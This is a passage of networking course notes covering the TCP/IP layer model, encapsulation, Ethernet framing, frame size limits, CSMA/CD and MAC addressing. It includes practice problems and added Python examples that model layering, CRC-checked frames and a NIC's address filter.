A layer in one machine communicates with the corresponding layer on the other machine using that layer's protocol. For example, the transport layer of the machine on the left communicates with the transport layer of the machine on the right using the transport layer protocol. A protocol is an agreement or a set of rules governing how a task or process should be carried out.

We mentioned that one of the functions of the transport layer is to ensure that data is delivered without errors. The transport layers on both machines might, for example, use the Hamming code to ensure that errors are detected and corrected. In this case, the agreed-upon protocol for error detection at the transport layer is the Hamming code. If the transport layer in the machine on the left is using the Hamming code to detect errors, but the machine on the right is using the CRC algorithm to detect errors, communication will not be successful. The peer entities at each layer must agree on the protocol.

As another example, we mentioned that one of the functions of the physical layer is to determine how logical 1 and logical 0 are represented. If the physical layer of the machine on the left is representing logical one by +5 volts and logical zero as -5 volts, but the machine on the right is doing just the opposite—representing logical one as -5 volts and logical zero as +5 volts—communication will not be successful. The peer entities at each layer must agree on the protocol.
To recap, two machines might be connected, but if a protocol is not in place at each layer, there will be no communication. If two people are talking to (at) each other, one who only speaks English and the other who speaks only Chinese, no successful communication will occur because the two speakers are not using the same protocol (in this case, the language). If agreed-upon protocols are in place, then the entities on the same layers on different machines (i.e., peer entities) carry on a conversation using the agreed-upon protocol.

Some additional jargon to impress your date:

Network Architecture. The set of layers and protocols is termed a network architecture.

Protocol Stack. The protocols used by a system are called the system's protocol stack.

4. Tanenbaum's Philosopher Analogy [18]

The various terms—layers, protocols, virtual communication, etc.—may seem confusing, so let's use these same concepts in a non-networking setting. Two philosophers wish to communicate, but they are far apart and they don't speak the same language. So they each hire a translator who translates their messages into a common language. The translators then pass their messages along through secretaries, who can communicate through a common interface. Note that it doesn't matter what the common interface is (fax, phone, e-mail) as long as both secretaries use the same interface. Similarly, it doesn't matter what the common language is (Dutch, English, Swahili) as long as the translators agree. Also, note that neither the secretaries nor the philosophers need know what the language choice was, just as the philosophers and the translators don't need to know how the message is transmitted. Each layer just needs to understand its interface to the next layer.

Figure 1. Tanenbaum's Philosopher Analogy. From Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall, 2003.

[18] See: Andrew S. Tanenbaum, Computer Networks, 4th ed., Prentice Hall, 2003 (pages 28-29).

So… how many layers exist in this scheme? You should agree that we have three layers, which we might call the Philosopher Layer, the Translator Layer and the Secretary Layer. Entities at the same layer must use the same protocol, or communication will not be successful. If the translator on the left translates messages into French while the translator on the right is expecting to receive messages in German, no deep philosophical thoughts will be exchanged between the philosophers. If the secretary on the left sends messages by fax, but the secretary on the right is only expecting messages by email, no philosophical thoughts will be shared.

Think about how layering helps us in this scenario. We can easily replace a layer with a different implementation that accomplishes the same task using a different mechanism, without disturbing the other layers. For example, the two translators might shift from Latin to Hebrew. As long as the two translators agree, the philosophers and secretaries will not be concerned (they might not even be aware of the shift in the language protocol). Similarly, the two secretaries might agree to shift from the fax protocol to the email protocol without even informing the translators or philosophers.

5. Encapsulation

So think again… how does a layer do its job? Here's how: At the sending end, each layer puts a header on the message received from the layer above. The header contains information necessary for the protocol to do its job. At the receiving end, each layer strips off the corresponding header and forwards the rest up to the layer above.

The application layer passes its message to the transport layer. The transport layer attaches some number of bits, shown as T in the picture above, and sends this onward to the network layer. The network layer then appends some number of bits, shown as N in the picture above, and so on, down the protocol stack.
What actually gets transmitted across the physical layer from the source to the destination is the fully encapsulated message: the bits marked P, D, N and T followed by the original message.

Now, this arrives at the destination. The destination physical layer removes the bits marked P and passes the result up to the data link layer. The data link layer removes the bits marked D and uses these bits to implement the data link protocol. Then the result is passed to the network layer, which removes the bits marked N and uses these bits to implement the network layer protocol, and so forth.

Practice Problem 11.1
Suppose an application entity generates 1024 bytes of data. By the time this data arrives at the data link layer, 96 bytes of header information has been added. At the data link layer, the maximum frame size is 256 bytes, 32 bytes of which are its header. How many frames will be used? How many total bytes must be transmitted?
Solution:

III. The TCP/IP Reference Model

The model we used in Section II was not chosen randomly! This model, repeated below, is termed the TCP/IP reference model. You should memorize this model! Use a mnemonic if it helps. One possibility is the West Point motto: Please Do Not Trash Army.

1. A Five Layer Model

The model we will use is the TCP/IP reference model, which consists of five layers. We list the layer, then describe some of the functions usually assigned to the layer.

The application layer

The application layer is concerned with general purpose facilities that involve communications:
- SMTP for email
- HTTP for accessing the web
- FTP for file transfer
- SSH and TELNET for remote log in
- DNS for directory assistance
- SNMP for network management

Several other functions are also conceptually placed at the application layer:
- Encoding. For example: Are we using EBCDIC or ASCII? Are we using Big Endian or Little Endian?
- Encryption
- Compression

Blocks of data at the application layer are termed messages. The application layer uses end-to-end protocols that do not recognize the existence of an underlying network.
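Before going on to the remaining layers, here is an added example that is not part of the EC310 notes: a small Python model of the layering, protocol and encapsulation ideas from Sections II.3 through II.5. Each layer prepends a header naming its protocol and treats whatever the layer above handed it as opaque payload; the receiver strips the headers in the reverse order and refuses a PDU whose header was written under a different protocol (the Hamming-versus-CRC mismatch), and the physical layer shows the +5 V / -5 V disagreement. The layer names, the header format and the protocol labels (smtp, hamming, crc, link-state, distance-vector, ethernet) are the example's own constructed assumptions, not anything the notes or a real stack define.

```python
from __future__ import annotations

# Added example (not from the EC310 notes): a toy five-layer stack showing
# virtual peer communication, encapsulation on the way down, decapsulation on
# the way up, and what happens when peer layers disagree on a protocol.
# All layer names, header formats and protocol labels are constructed.


class ProtocolMismatch(Exception):
    """Raised when a layer receives a header written under a protocol it does not speak."""


class Layer:
    """One layer (application, transport, network or data link).

    Going down, the layer prepends a small header naming itself and its protocol
    and never looks inside the payload it was handed (layer n does not interpret
    layer n+1's data). Going up, it strips its own header and refuses the PDU if
    the peer used a different protocol.
    """

    def __init__(self, name: str, protocol: str) -> None:
        self.name = name
        self.protocol = protocol

    def header(self) -> bytes:
        return f"{self.name}:{self.protocol}|".encode()

    def encapsulate(self, payload: bytes) -> bytes:
        return self.header() + payload

    def decapsulate(self, pdu: bytes) -> bytes:
        expected = self.header()
        if not pdu.startswith(expected):
            got = pdu.split(b"|", 1)[0]
            raise ProtocolMismatch(f"{self.name} layer cannot parse header {got!r}")
        return pdu[len(expected):]


class Physical:
    """Physical layer: maps each bit to a voltage; peers must agree which voltage is a 1."""

    def __init__(self, one_volts: int = +5) -> None:
        self.one_volts = one_volts

    def transmit(self, frame: bytes) -> list[int]:
        bits = "".join(f"{byte:08b}" for byte in frame)
        return [self.one_volts if b == "1" else -self.one_volts for b in bits]

    def receive(self, signal: list[int]) -> bytes:
        bits = "".join("1" if v == self.one_volts else "0" for v in signal)
        return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def build_stack(transport: str = "hamming", network: str = "link-state") -> list[Layer]:
    """Layers listed top-down; only the protocol labels vary between experiments."""
    return [Layer("application", "smtp"), Layer("transport", transport),
            Layer("network", network), Layer("datalink", "ethernet")]


def on_the_wire(message: bytes, stack: list[Layer] | None = None) -> bytes:
    """The byte string handed to the physical layer: outermost header first."""
    pdu = message
    for layer in stack or build_stack():      # application down to data link
        pdu = layer.encapsulate(pdu)
    return pdu


def send(stack: list[Layer], phy: Physical, message: bytes) -> list[int]:
    return phy.transmit(on_the_wire(message, stack))   # the only real transfer


def receive(stack: list[Layer], phy: Physical, signal: list[int]) -> bytes:
    pdu = phy.receive(signal)
    for layer in reversed(stack):             # data link up to application
        pdu = layer.decapsulate(pdu)
    return pdu


def deliver(message: bytes, sender: list[Layer], receiver: list[Layer],
            tx: Physical | None = None, rx: Physical | None = None) -> tuple[bool, bytes | str]:
    """Run a message through both stacks; report the message or the layer that failed."""
    tx = tx or Physical()
    rx = rx or Physical()
    try:
        return True, receive(receiver, rx, send(sender, tx, message))
    except ProtocolMismatch as err:
        return False, str(err)


if __name__ == "__main__":
    print(on_the_wire(b"Hi"))
    print(deliver(b"Hi", build_stack(), build_stack()))
    # Swapping the routing protocol on both sides leaves every other layer untouched.
    print(deliver(b"Hi", build_stack(network="distance-vector"), build_stack(network="distance-vector")))
    # Peers that disagree on a protocol do not communicate, at that layer.
    print(deliver(b"Hi", build_stack(transport="hamming"), build_stack(transport="crc")))
    print(deliver(b"Hi", build_stack(), build_stack(), Physical(+5), Physical(-5)))
```

Running the script prints the wire image with the data link header outermost and the application header innermost, then a successful delivery, a delivery that still succeeds after both network layers switch from link-state to distance-vector (the transport and application code never changed), and two failures: one reported by the transport layer when the peers use different error-control protocols, and one reported by the data link layer when the two physical layers disagree on which voltage means logical 1, so every byte arrives complemented.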
The notion of a networking protocol being end-to-end can be somewhat confusing, so it may be helpful to recast the notion in terms of a different network you are familiar with: the telephone network. Suppose you (in Annapolis) are having a phone conversation with your friend (in Florida) over the plain-old-telephone system. Suppose you use some acronyms in your conversation. Instead of saying United States Naval Academy you say USNA. Instead of saying Midshipmen Regulations Manual you say MIDREGS. Instead of saying Brigade Medical Unit, you say BMU. Instead of saying Greatest Bestest Course Ehvur you say Cyber-2. Using acronyms is a form of data compression. You are conveying the exact same information to your friend, but you are doing this with fewer syllables.

Now, ask yourself: Does the Phone Company—the wires, the switching stations, the fiber optic cables—care if you are using acronyms to compress your data? The answer is, of course: No. The phone company does not care, and is not even aware, of the use of compression in your voice conversation. It only matters to the end users who are actually speaking on the telephone.

Now, let's switch back to computer networks. We mentioned that the application layer can implement compression. As with phones, so with computers: only the end points will care, or even be aware of the fact that data is being compressed. The underlying computer network is oblivious to this.

Consider another example: Encoding. Encoding is done at the application layer, and an encoding protocol is end-to-end: the network is not aware of the encoding scheme. In a telephone conversation, the encoding scheme might be the language that you and your friend converse in. The phone company's network does not care if your conversation is in English or Spanish; this is a concern only to the end users. So, again, the application layer protocols are end-to-end.
The transport layer

Ideally, the transport layer is responsible for the end-to-end transfer of data from a process in the source to a process at the destination, independent of the network. Put another way, ideally the transport layer uses end-to-end protocols that do not recognize the existence of an underlying network. Blocks of data at the transport layer are termed segments.

Some tasks of the transport layer:
- End-to-end flow control
- End-to-end error control
- End-to-end congestion control [19]
- Multiplexing: sending several transport layer connections over a single network layer connection.

The phone company analogy is useful again for recognizing that the protocols at the transport layer are end-to-end. Does the phone company's network care if the person on the receiving end says: "Slow down, I'm trying to write this down" (Flow control)? Does the phone company's network care if the person on the receiving end says: "Let me read this back to you to make sure I've got it" (Error control)? The answers: No and No; these are end-to-end concerns.

[19] The ideal separation of layers breaks down in practice. Although congestion control algorithms are end-to-end algorithms, they are designed to alleviate congestion in a network.

In the next three layers, the protocols are between adjacent entities (machine-router, router-router, router-machine).

The network layer

The network layer is concerned with transferring data across a communications network from a source computer to a destination computer. This is the first layer that recognizes the existence of a network. Blocks of data at the network layer are termed packets or datagrams.

Tasks for the network layer include:
- Routing
- Internetworking: interconnecting distinct networks that use different protocols (different addressing schemes, different packet sizes, etc.)

The data link layer

The data link layer is concerned with transferring data across a single link connecting two nodes.
Blocks of data at the data link layer are termed frames.

Tasks for the data link layer include:
- Setting frame boundaries
- Error control (to make a real link into an error-free link)
- Link flow control (to stop a fast transmitter from drowning a slow receiver)
- Controlling access to shared channels: the Multiple Access Problem

The physical layer

The physical layer is concerned with sending bits over a channel: i.e., the mechanical and electrical considerations. Blocks of data at the physical layer are termed bits… so we're not really talking about blocks!

2. The Big Picture Again

In each layer, a process on one computer communicates with a peer process on another computer using that layer's protocol. This communication is virtual.

The layer n + 1 entity uses the services provided by layer n. Layer n + 1 only cares that layer n performs the desired service. How layer n goes about performing the service (i.e., the implementation) is of no interest to layer n + 1. The layer n protocol does not interpret the information passed to it by layer n + 1.

At the sending end, each layer puts a header on the message received from the layer above. The header contains information necessary for the protocol to do its job. At the receiving end, each layer strips off the corresponding header and forwards the rest up to the layer above.

For example, the picture below focuses on the network layer, and we can see that a segment from the transport layer (in gray) is encapsulated into a packet at the network layer (by adding the header shown in pink). This packet is then sent to the data link layer.

Source: Forouzan, Data Communications and Networking, 4th ed., McGraw Hill, 2007

The process will continue. The packet at the network layer will be encapsulated into a frame at the data link layer. See PowerPoint slide "Layers" on the course website.

As we discuss the security issues in the TCP/IP Model, we must keep in mind that networks must remain useful.
All ITSD network security problems at the Naval Academy could be instantly solved by simply preventing all midshipmen, faculty and staff from using computers and computer networks! That is not a good solution. We want to be able to use our networks, but in a safe and secure manner.

Practice Problem 11.2
You caught one of your crewmembers attempting to gamble online on one of your ship's computers. After putting him on report, he tells you that the computer did not seem to be working. For each of the network problems below, state which layer of the TCP/IP model the problem resides in.
(a) Our computer cannot communicate with a website due to an error in the routing algorithm used by an intermediate node.
(b) Our computer cannot communicate with a website because your crewmember spilled his drink on the cable adapter, causing a short.
(c) Our computer cannot communicate with a website due to the fact that the two users (us and them) are using different end-to-end error control algorithms.
(d) Our computer cannot communicate with a website because we are using the XYZ-encryption algorithm, but the website server is using the (incompatible) ABC-decryption algorithm.
Solution:
(a)
(b)
(c)
(d)

Practice Problem 11.3
For the boxes below, fill in the names of the layers for the TCP/IP 5-layer reference model and then place the appropriate letter in the blank associated with the layer for the proper description of its services.
Layer 5 _____ ______
Layer 4 _____ ______
Layer 3 _____ ______
Layer 2 _____ ______
Layer 1 _____ ______
a) Provides a definition of mechanical and electrical standards for communication system
b) Concerned with transferring packets across a communication network
c) Responsible for end to end transfer of data
d) Primary function is to format and transfer files between communication message and the user's software
e) Frames of data are transferred across a single link
Solution:

Problems

1. The basic unit of information sent at the application layer is termed a message. Write down the term that is used to denote the basic unit of information sent at each of the layers listed below:
(a) transport layer
(b) network layer
(c) data link layer
(d) physical layer

2. What is the name used for the data unit that is encapsulated within a data link frame?

3. What is the name for the data unit that is decapsulated from a packet?

4. A program wants to send 100 bytes of data. The application layer adds a ten byte header (resulting in a 110-byte message). Suppose every succeeding layer also appends a ten byte header. When the resulting bits are eventually transmitted out of the physical layer, what percentage of these bits corresponds to the program's data?

5. State the layer of the TCP/IP reference model that is responsible for each of the following tasks:
(a) Determining the route from source to destination
(b) Handling a frame received from an adjacent computer
(c) Detecting end-to-end errors
(d) Transmitting +5 volts to denote logical 1 and -5 volts to denote logical 0

6. List the layers of the TCP/IP model and select from the list below the letter that best describes the main function of each layer.
(a) Transfers frames across a single link connecting two nodes
(b) Responsible for end-to-end flow, error, and congestion control
(c) Sends bits over a channel
(d) Processes that provide services to users such as HTTP and FTP
(e) Responsible for routing packets and internetworking

7. (a) Suppose an application entity sends an L-byte message to its peer entity. The layers in the TCP/IP model add a total of 58 bytes of overhead (header and trailer). What percentage of the physical layer bits corresponds to the application message if L = 100 bytes?
(b) Repeat part (a) for L = 1000 bytes.

Chapter 12: Ethernet

Objectives:
(a) Define the structure of an Ethernet address.
(b) State the minimum and maximum size of an Ethernet frame.
(c) Calculate the bandwidth available to users in various network configurations.
(d) Distinguish between the capabilities and uses of a hub, a bridge and a switch.

I. Ethernet

1. Introduction

In the late 1960's and into the early 1970's, computers were stand-alone devices. A computer at, say, Stanford, had no way of communicating with a computer at, say, the Naval Academy. Research teams (largely funded by the DoD) began to explore methods for linking computers together, allowing them to transmit information back and forth.

A breakthrough occurred when Robert Metcalfe proposed a technique for joining computers together. At heart, the computers were joined together by a wire allowing bits to flow between computers. The sketch below (from Metcalfe's 1976 conference paper) shows four computers (in red) joined together by a wire (in yellow). (Note that one of the four computers is drawn to be larger than the other three in order to show some internal details.)

Metcalfe, an Electrical Engineer, called his proposal "Ethernet." His company, Xerox (yes, Xerox, the same company that said "No Thank-you" to the first computer with a GUI that it had developed in-house three years before Apple, and the same company that saw no future in the first computer mouse that it had developed in-house) was not interested in doing anything with the Ethernet proposal, so Metcalfe formed his own company in 1979 and named it 3Com. 3Com went on to sell hundreds of millions of Ethernet adapter cards as a Fortune 500 Company (3Com was purchased by HP in 2009). Network World reported that by 2010, approximately $16 billion in Ethernet equipment had been sold per year. [20]

You may be wondering: Just run a wire between the computers?… there's got to be more to it than that! There are indeed four considerations. First, if one computer sends data to another, there has to be a mechanism to allow the intended recipient to know where the block of data begins and ends.
In other words, the recipient must be able to look at the collection of received bits—called a frame—and determine where the frame begins and ends. This is called the framing problem. Second, in order to send a frame to a specific device, every device will need a unique address. This is the address problem. Third, the receiver should be able to determine if the received frame has errors. This is called the error-control problem. Fourth, we have to consider the possibility that more than one computer may place their frame on the wire at the same time. This will cause the electrical signals to collide, and both frames will be destroyed. This is called the multiple access problem.

Metcalfe's breakthrough proposal—Ethernet—handles these four issues. Other competing proposals to join computers together into a local area network (Token Ring, Token Bus, ATM, FDDI) have since fizzled and died, leaving Ethernet as the only game in town for wired local area networks.

The original Ethernet transmitted at a bit rate of 10 megabits per second (Mbps). In 1995, a 100 Mbps Ethernet standard was introduced, dubbed Fast Ethernet. This was followed in 1998 by Gigabit Ethernet (with a data rate of 1 Gbps) and in 2002 by a 10 Gbps standard (10-Gigabit Ethernet). A 100 Gbps Ethernet standard was recently approved (2010), but commercial products have not yet reached the market.

[20] In 1996, Steve Jobs stated that "Xerox could have owned the entire computer industry today."

Note that we are dealing exclusively with transmitting data over a single link. Stated another way and with reference to the TCP/IP reference model: we are dealing with data link-layer concerns. Additionally, note that Ethernet is implemented in a computer's Network Interface Card (NIC).

2. Ethernet's Solution to the Framing Problem

All Ethernet variants (10 Mbps, 100 Mbps, 1 Gbps and 10 Gbps) use the same data link frame format, shown below.

Figure 13.4: 802.3 MAC frame
Source: Forouzan, Data Communications and Networking, McGraw Hill, 2007

The fields are:

Preamble: The preamble is not formally part of the Ethernet frame. It is added by the physical layer. It consists of the byte 10101010 repeated 7 times. The preamble allows the receiver to synchronize to the beginning of the frame.

Start Frame Delimiter (SFD): The SFD is not formally part of the Ethernet frame. It is added by the physical layer. It is the single byte 10101011. Notice that the start frame delimiter follows the same pattern of alternating ones and zeroes as the preamble, except that it concludes with two consecutive 1's. These two consecutive 1's indicate that synchronization is over, and the real stuff is about to start: the next item will be the destination address.

The Destination and the Source Ethernet Addresses: Much more on this to follow!

Length or Type: This field usually specifies the kind of data the frame carries (e.g.: Is the data an IP packet?). In rare implementations, this field is used instead to serve as a Length Field, providing the number of bytes in the data field.

Data and padding: This holds the data that was received from the network layer. The minimum size of the "Data and Padding" field must be 46 bytes, and the maximum size of this field is 1500 bytes.

CRC: Cyclic Redundancy Code used for error detection. More on this below.

Practice Problem 12.1
What is the minimum size of an Ethernet frame? (Do not include the physical layer header in your calculation.)
Solution:

Practice Problem 12.2
What is the maximum size of an Ethernet frame? (Do not include the physical layer header in your calculation.)
Solution:

Practice Problem 12.3
Why would padding ever be used in the field marked Data and padding?
Solution:

So, Ethernet frames must be at least 64 bytes and are not permitted to exceed 1518 bytes. Which raises the question: Why these size limitations? The maximum Ethernet frame size is easy to appreciate.
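Before turning to the reasons behind these limits, here is an added example, not code from the notes and not any real NIC's implementation: a Python script that builds and parses an Ethernet frame by hand. It shows the padding of a short payload up to 46 bytes, the 64-byte and 1518-byte limits, the preamble and start frame delimiter that the physical layer prepends, and the CRC check described under "Ethernet's Solution to the Error Control Problem" later in this chapter, carried out literally as polynomial division: the transmitter fills the last four bytes so that the whole frame divides evenly by the CRC-32 generator, and the receiver accepts the frame only when its remainder is zero. One assumption to note: real 802.3 additionally complements the first 32 bits, reflects the bit order and complements the remainder, all of which is left out here so that the "no remainder" statement holds exactly. The addresses, type value and payloads are constructed sample data.

```python
# Added example (not from the EC310 notes or any Ethernet implementation).
# Builds and parses an 802.3 frame, pads short payloads, enforces the size
# limits and computes the CRC as plain GF(2) division by the CRC-32 generator.
# Addresses and payloads below are constructed; 0x0800 is the IP type value.

CRC32_GENERATOR = 0x104C11DB7          # x^32 + x^26 + x^23 + ... + x + 1 (33 bits)
PREAMBLE = bytes([0b10101010]) * 7     # added by the physical layer, not part of the frame
START_FRAME_DELIMITER = bytes([0b10101011])
MIN_DATA, MAX_DATA = 46, 1500          # limits on the "Data and padding" field
MIN_FRAME, MAX_FRAME = 64, 1518        # 6 + 6 + 2 + data + 4


def crc32_remainder(data: bytes) -> int:
    """Remainder of (data as a polynomial over GF(2)) * x^32 divided by the generator.

    Long division one bit at a time: whenever the 33rd bit of the running
    remainder is set, the generator is subtracted (XOR). No initial value,
    bit reflection or final inversion is applied (the real 802.3 FCS adds
    those), so an intact frame divides to exactly zero.
    """
    reg = 0
    for bit in ((byte >> i) & 1 for byte in data for i in range(7, -1, -1)):
        reg = (reg << 1) | bit
        if reg & (1 << 32):
            reg ^= CRC32_GENERATOR
    for _ in range(32):                # multiply by x^32: shift in 32 zero bits
        reg <<= 1
        if reg & (1 << 32):
            reg ^= CRC32_GENERATOR
    return reg


def build_frame(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
    """What the sending NIC assembles from a network-layer packet."""
    if len(dst) != 6 or len(src) != 6:
        raise ValueError("Ethernet addresses are 6 bytes")
    if len(payload) > MAX_DATA:
        raise ValueError("payload exceeds 1500 bytes; the network layer must split it")
    data = payload.ljust(MIN_DATA, b"\x00")          # pad so the frame reaches 64 bytes
    body = dst + src + ethertype.to_bytes(2, "big") + data
    fcs = crc32_remainder(body).to_bytes(4, "big")   # makes the whole frame divisible
    return body + fcs


def parse_frame(frame: bytes) -> dict:
    """What the receiving NIC does: check the size, check the CRC, split the fields."""
    if not MIN_FRAME <= len(frame) <= MAX_FRAME:
        raise ValueError(f"frame length {len(frame)} outside {MIN_FRAME}..{MAX_FRAME}")
    return {
        "dst": frame[0:6].hex(":"),
        "src": frame[6:12].hex(":"),
        "type": int.from_bytes(frame[12:14], "big"),
        "data": frame[14:-4],                       # still includes any padding
        "crc_ok": crc32_remainder(frame) == 0,      # zero remainder <=> no detected error
    }


def flip_bit(frame: bytes, bit_index: int) -> bytes:
    """Simulate a single transmission error at the given bit position."""
    damaged = bytearray(frame)
    damaged[bit_index // 8] ^= 1 << (7 - bit_index % 8)
    return bytes(damaged)


def physical_layer_encapsulate(frame: bytes) -> bytes:
    """The bit stream on the wire: preamble and SFD in front of the frame."""
    return PREAMBLE + START_FRAME_DELIMITER + frame


if __name__ == "__main__":
    broadcast = bytes([0xFF] * 6)
    src = bytes.fromhex("00000c112233")             # constructed address with the Cisco prefix
    frame = build_frame(broadcast, src, 0x0800, b"hello")
    print(len(frame), parse_frame(frame))           # 64 bytes, crc_ok True
    print(parse_frame(flip_bit(frame, 100))["crc_ok"])   # False: one flipped bit is caught
    print(len(physical_layer_encapsulate(frame)))  # 72: 8 physical-layer bytes in front
```

A five-byte payload comes out as a 64-byte frame because 41 zero bytes of padding are appended; a 1500-byte payload produces the 1518-byte maximum, and anything larger is refused before a frame is built. Any single flipped bit is always detected, since the generator has a constant term and therefore cannot divide a lone x^k; the plain division used here does miss leading zero bytes prepended to a frame, which is one reason the real FCS starts from an all-ones register.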
We limit the maximum frame to 1518 bytes for three reasons:

To prevent a single user from hogging the network. Recall the picture on page 271 that shows four users sending their data over the same wire. Suppose you are one of those users, and you want to send a frame. With Ethernet, a user who wants to transmit a frame first listens on the wire to make sure no one else is already transmitting. If someone else is already transmitting, then it would make no sense for you to transmit at the same time: You would garble the transmission in progress, and your transmission would also be garbled. So, you patiently wait for the wire to go idle before you transmit. Since Ethernet users always politely wait for the shared wire to go idle before transmitting, a greedy user who starts transmitting could keep transmitting forever, never allowing others an opportunity to transmit their frames. To avoid this, a user is allowed to transmit at most 1518 bytes before they must stop and give other users an opportunity to transmit their frames.

Error control. With Ethernet, if a single bit arrives in error, the entire frame is thrown away by the receiver. Since each bit represents an opportunity for error, the fewer bits we have, the fewer opportunities for error we have.

Historical reasons. Data that arrives at the NIC must be buffered before it is sent to main memory. Although memory is very cheap today, memory was very expensive in the 1970s and 1980s when the Ethernet standard was developed.

The minimum Ethernet frame size—64 bytes—is based on technical considerations that are far less intuitive. We mentioned that when a host using Ethernet wants to transmit a frame, it first listens to see if anyone else is transmitting. Only if a host senses that the medium is "quiet" does it proceed with the transmission of its frame. But even if a host takes care to ensure that the medium is quiet, collisions can still occur!
For example, suppose two hosts want to transmit an Ethernet frame at the same time and both first listen to ensure the medium is not in use. Both stations will detect that the medium is not in use and both will start transmitting! These sorts of collisions are unavoidable.

Since collisions are unavoidable, we want to ensure that a user can tell if his transmission was involved in a collision. When Ethernet users start transmitting, they continue to listen to the channel to detect a collision. It is important for a user to know if his frame was involved in a collision since any frames involved in collisions will need to be retransmitted. Thus, we need to ensure that User-1 is still transmitting under the condition that the furthest away station (say, User-2) listens to the channel just before User-1's frame arrives, senses it idle and starts transmitting also. Based on the maximum allowed separation between users and the speed of light (more precisely: the speed of propagation in the cable), it can be shown (we skip the derivation) that if the minimum frame size is set to 64 bytes (512 bits) a user will be able to tell if it was his frame that was involved in a collision.

An Aside

Ethernet users share access to the channel. For that reason, Ethernet is termed a Multiple Access (MA) scheme. In addition, Ethernet users listen to (i.e., sense) the channel before transmitting. This way they do not start transmitting their frame while another frame transmission from some other user is already in progress. For that reason, Ethernet is termed a Channel Sense Multiple Access (CSMA) scheme. [21] Finally, even after an Ethernet user starts transmitting, she continues to sense the channel for collisions. Collisions can occur if two users sense the channel idle at the same time and start transmitting. When a host detects that her frame is colliding, she immediately stops transmitting (what's the point of continuing to transmit a frame if we already know it's garbled?).
For this reason, Ethernet is termed a Channel Sense Multiple Access with Collision Detection (CSMA/CD) scheme.

[21] Since a signal in this context is carrying our data, it is referred to as a carrier signal; when we sense the channel we are sensing to detect the presence or absence of the carrier signal. Thus, CSMA is most often called Carrier Sense Multiple Access.

3. Ethernet's Solution to the Address Problem

Each Network Interface Card (NIC) is assigned a globally unique address—an Ethernet address—that is burned into the card's Read Only Memory (ROM). ROM is non-volatile memory whose contents cannot be altered by the user. All machines on an Ethernet LAN are guaranteed to have unique addresses. Moreover, no two hosts anywhere in the world have the same Ethernet address. So, when you buy a NIC (or, as is most often the case, a computer that contains a NIC), you are also buying a globally unique Ethernet address that only you possess.

Ethernet addresses are 6 bytes. It is important to realize that Ethernet addresses are also commonly referred to as physical addresses, hardware addresses and Medium Access Control (MAC) addresses—these terms are all synonyms!

Practice Problem 12.4
(a) How many bits are in an Ethernet address?
(b) How many hexadecimal digits are needed to express an Ethernet address?
Solution:
(a)
(b)

Ethernet addresses are usually expressed in hexadecimal notation (sometimes with colons between the bytes). For example, an Ethernet address might be 06:01:03:02:2A:3D.

Practice Problem 12.5
Two of these 48 bits in an Ethernet address are used for special purposes. Disregarding these two bits, how many possible Ethernet addresses exist?
Solution:

Practice Problem 12.6
If there are 7 billion people in the world, and we disperse Ethernet addresses uniformly, how many addresses are available for each person?
Solution:

You should be convinced that we are in no danger of "running out" of Ethernet addresses!
The uniqueness of Ethernet addresses is assured by the fact that the first 3 bytes of the address are assigned to a given manufacturer (or vendor), and this vendor must use these three bytes as the first three bytes in every NIC that the vendor manufactures. (The Institute of Electrical and Electronics Engineers—IEEE—is the group that actually does this assignment.) For instance, all NICs manufactured by 3COM have Ethernet addresses starting with 02608C, all NICs manufactured by Cisco have Ethernet addresses starting with 00000C, etc.

Practice Problem 12.7
How many possible Ethernet addresses exist for each individual vendor?
Solution:

Sometimes, a host may want to transmit a frame to every other user on the Ethernet LAN. A special address is reserved for this purpose. A host may send a frame to everyone by sending the frame to the broadcast address, which is the address consisting of all ones; i.e., a string of 48 consecutive 1's.

Practice Problem 12.8
Express the Ethernet broadcast address in hexadecimal.
Solution:

Referring back to the Ethernet picture on page 271, any frame transmitted by any user arrives at the NIC of all other directly connected users! Stated another way, the NIC receives all frames that are sent on the wire. But it only forwards some of the frames up to the host's network layer. Specifically, the NIC only forwards to the network layer:

- Frames addressed to its own unique address. When a frame arrives at the NIC, the NIC checks the frame to see the destination address. If the destination address of the frame matches its NIC address, then the NIC "realizes" that this data is intended for itself, and passes the frame to the network layer. If the destination address in the frame does not match its NIC address, the frame is discarded.
- Frames addressed to the broadcast address. As mentioned, a frame sent to the broadcast address (48 ones) will be accepted by every NIC.
- All frames, if the NIC is placed in "promiscuous" mode.
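The address structure and the NIC's accept-or-discard rule above, as an added Python example that is not part of the notes and not any vendor's driver code. The first function splits an address into the IEEE-assigned vendor prefix and the vendor-chosen remainder and reports the two special-purpose bits, which are the two low-order bits of the first byte: the individual/group bit (set in the broadcast address and in every multicast address) and the universally/locally administered bit (clear in a burned-in address). The NIC model then applies the three forwarding rules, including promiscuous mode. The sample addresses and the three frames on the shared wire are constructed; the 00:00:0C prefix is the Cisco example from the notes, and the frames carry only the header fields needed for the address check.

```python
from __future__ import annotations

# Added example (not from the EC310 notes): Ethernet address structure and the
# receive-side filter of a NIC, including promiscuous mode. All addresses and
# frames are constructed for illustration.

BROADCAST = bytes([0xFF] * 6)        # 48 consecutive 1s


def parse_mac(text: str) -> bytes:
    """Accept 06:01:03:02:2A:3D, 06-01-03-02-2A-3D or 060103022A3D."""
    digits = text.replace(":", "").replace("-", "")
    if len(digits) != 12:
        raise ValueError(f"an Ethernet address has 12 hex digits, got {text!r}")
    return bytes.fromhex(digits)


def format_mac(mac: bytes) -> str:
    return ":".join(f"{b:02X}" for b in mac)


def describe_mac(text: str) -> dict:
    """Split an address into its vendor and NIC-specific parts and expose its flag bits."""
    mac = parse_mac(text)
    first = mac[0]
    return {
        "oui": format_mac(mac[:3]),                   # vendor prefix assigned by the IEEE
        "nic_specific": format_mac(mac[3:]),          # chosen by the vendor, unique per card
        # The two special-purpose bits are the low-order bits of the first byte:
        "group": bool(first & 0x01),                  # I/G bit: 1 = multicast or broadcast
        "locally_administered": bool(first & 0x02),   # U/L bit: 0 = burned-in (universal) address
        "broadcast": mac == BROADCAST,
    }


class Nic:
    """A network interface card's receive-side filter."""

    def __init__(self, address: str, promiscuous: bool = False) -> None:
        self.address = parse_mac(address)
        self.promiscuous = promiscuous

    def accepts(self, frame: bytes) -> bool:
        dst = frame[:6]                               # destination address is the first field
        return self.promiscuous or dst == self.address or dst == BROADCAST

    def deliver(self, frames: list[bytes]) -> list[bytes]:
        """Payloads handed up to the network layer; every other frame is discarded."""
        return [frame[14:] for frame in frames if self.accepts(frame)]


def make_frame(dst: str, src: str, payload: bytes) -> bytes:
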